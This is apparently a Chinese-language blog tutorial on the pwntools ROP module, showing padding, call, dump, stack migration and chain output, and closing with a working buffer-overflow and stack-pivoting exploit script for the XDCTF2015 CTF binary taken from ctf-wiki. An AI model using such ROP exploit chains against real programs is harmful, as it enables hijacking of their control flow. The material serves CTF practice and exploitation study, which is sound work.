pwntools_3 ROP模块

1.首先对某可执行文件创建一个rop对象

In [57]: rop=ROP('main')
[*] '/home/u/rop/main'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[*] Loaded cached gadgets for 'main'

In [58]: rop
Out[58]: ROP([ELF('/home/u/rop/main')])

预览一下所有属性和方法:

In [59]: rop.
rop.base                   rop.elfs                   rop.leave                  rop.resolve
rop.build                  rop.find_gadget            rop.migrate                rop.search
rop.call                   rop.find_stack_adjustment  rop.migrated               rop.search_iter
rop.chain                  rop.from_blob              rop.pivots                 rop.setRegisters
rop.describe               rop.gadgets                rop.raw                    rop.unresolve
rop.dump                   rop.generatePadding        rop.regs                   

方法raw:手动添加数据

In [72]: rop.raw("a"*10)

这样rop中添加了10个padding,如果知道了离覆盖返回地址的长度,可以先填充字符串或者0x90
方法dump:
会将已经构建的栈数据输出,而且方便阅读
方法:call:

rop.call('read',[1,2,3])
print rop.dump()
0x0000:           'aaaa' 'aaaaaaaaaa'
0x0004:           'aaaa'
0x0008:           'aaaa'
0x000c:        0x80483a0 read(1, 2, 3)
0x0010:           'eaaa' 
0x0014:              0x1 arg0
0x0018:              0x2 arg1
0x001c:              0x3 arg2

第一个参数为目标函数符号名,第二个参数是个list,作为目标函数的参数.然后构建出数据拼接到已有的数据中
或者使用rop.read(1,2,3):效果和call一样.细心点可以发现前一个read后的返回地址改成了栈调整的数据.rop模块会自动寻找gadget来连接上2次功能调用

print rop.dump()
0x0000:           'aaaa' 'aaaaaaaaaa'
0x0004:           'aaaa'
0x0008:           'aaaa'
0x000c:        0x80483a0 read(1, 2, 3)
0x0010:        0x8048376  add esp, 8; pop ebx; ret
0x0014:              0x1 arg0
0x0018:              0x2 arg1
0x001c:              0x3 arg2
0x0020:        0x80483a0 read(1, 2, 3)
0x0024:           'jaaa' 
0x0028:              0x1 arg0
0x002c:              0x2 arg1
0x0030:              0x3 arg2

rop.unresolve('main') 返回符号的地址

方法:rop.migrate(地址)

rop.migrate(2)
print rop.dump()
0x0000:           'aaaa' 'aaaaaaaaaa'
0x0004:           'aaaa'
0x0008:           'aaaa'
0x000c:        0x80483a0 read(1, 2, 3)
0x0010:        0x8048376  add esp, 8; pop ebx; ret
0x0014:              0x1 arg0
0x0018:              0x2 arg1
0x001c:              0x3 arg2
0x0020:        0x80483a0 read(1, 2, 3)
0x0024:        0x8048376  add esp, 8; pop ebx; ret
0x0028:              0x1 arg0
0x002c:              0x2 arg1
0x0030:              0x3 arg2
0x0034:        0x804861b pop ebp; ret
0x0038:             -0x2
0x003c:        0x8048458 leave; ret

从代码中可以看到,第2个read的返回地址被调整为 0x8048376 add esp, 8; pop ebx; ret.
执行完后esp指向-2,并且进入 0x804861b pop ebp; ret执行代码,然后ebp被置为-2.如果此处换成其他地址,则栈就被迁移到另外一个地方去了.ret后,进入leave;ret,执行完后ebp为[-2],进入新栈的第二个4B地址处,esp指向新栈的第三个4B地址处. 为什么这里是-2,而不是2,因为这个函数的参数是当0x003c: 0x8048458 leave; ret
执行后,eip的去向, 当执行完leave之后,esp指向2(因为leave==mov esp,ebp;pop ebp),ret后,eip会转向地址2处的地址,即通过栈迁移后控制程序往哪里执行.

方法:rop.chain()

rop.chain()
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xa0\x83\x04\x08v\x83\x04\x08\x00\x00\x00\x00@\xa8\x04\x08d\x00\x00\x00\x1b\x86\x04\x08<\xa8\x04\x08X\x84\x04\x08'

返回完整的shellcode

有时候一次运行需要多次rop,再次重新生成rop,则重新调用ROP(path)创建一个rop即可

典型实例:

#coding:utf-8
#原文来源于ctf-wiki:https://github.com/ctf-wiki/ctf-wiki
from pwn import *
elf = ELF('main')
r = process('./main')
rop = ROP('./main')

offset = 112
bss_addr = elf.bss()

r.recvuntil('Welcome to XDCTF2015~!\n')

## stack pivoting to bss segment
## new stack size is 0x800
stack_size = 0x800
base_stage = bss_addr + stack_size
### padding offset是缓冲区里返回地址的距离,这块直接填充
rop.raw('a' * offset)
### read 100 byte to base_stage
#添加read函数,当源程序的vuln函数返回时被劫持进入read函数,此时会等待输入,也就是将第二个rop写入到
#base_stage中
rop.read(0, base_stage, 100)
### stack pivoting, set esp = base_stage
rop.migrate(base_stage)
#将第一个rop发送后,程序流程被劫持到read
#函数,此时程序等待输入等本脚本的下面的sendline执行后,会将下面的定义的rop给read到base_stage中去
#然后第一个rop的rop.migrate(base_stage)会将程序流程又转到[base_stage],因为此时的base_stage被read
#函数写入了第二个rop,其中第二个rop的开始就是rop.write(1, base_stage + 80, len(sh)),因此进入了第二rop的执行流程这时就会把字符串/bin/sh打印出来

r.sendline(rop.chain()) 

## write cmd="/bin/sh"
rop = ROP('./main')
sh = "/bin/sh"
rop.write(1, base_stage + 80, len(sh))
rop.raw('a' * (80 - len(rop.chain())))
rop.raw(sh)
rop.raw('a' * (100 - len(rop.chain())))

r.sendline(rop.chain())
r.interactive()

你可能感兴趣的:(pwntools_3 ROP模块)